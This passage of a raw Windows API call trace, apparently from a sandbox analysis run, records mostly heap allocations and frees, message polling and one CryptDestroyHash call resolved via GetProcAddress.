Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.150] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.150] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.150] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0185.150] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0185.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0185.151] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.151] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699a8 [0185.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0185.154] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.155] CryptDestroyHash (hHash=0xa87410) returned 1 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0185.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0185.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: 